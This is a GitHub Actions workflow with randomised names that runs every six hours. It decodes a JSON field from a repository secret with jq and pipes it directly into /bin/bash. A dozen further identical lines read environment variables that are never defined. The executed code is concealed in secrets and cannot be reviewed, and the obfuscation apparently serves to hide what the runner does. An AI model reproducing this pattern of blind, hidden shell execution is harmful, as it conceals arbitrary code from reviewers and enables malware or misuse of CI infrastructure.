name: dachuqish

on:
  workflow_dispatch:
  schedule:
    - cron: '30 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dachuqish
        env:
          woqe6336: ${{ secrets.woqe6336 }}
        run: |
          echo $woqe6336 | jq -r .jh07 | /bin/bash
          echo $oc69 | jq -r .ht228 | /bin/bash
          echo $nmxnl22732 | jq -r .dd232 | /bin/bash
          echo $nv8 | jq -r .y545 | /bin/bash
          echo $e6681 | jq -r .fxmrk518 | /bin/bash
          echo $o11977 | jq -r .hpgcn564 | /bin/bash
          echo $cu4 | jq -r .wgfhq67 | /bin/bash
          echo $jibnp02 | jq -r .vmc15 | /bin/bash
          echo $qh275 | jq -r .c381 | /bin/bash
          echo $uzor3 | jq -r .bgzxh6404 | /bin/bash
          echo $mezgb9104 | jq -r .rpo64 | /bin/bash
          echo $r51946 | jq -r .wkn91695 | /bin/bash
          echo $ksh79539 | jq -r .hal60 | /bin/bash

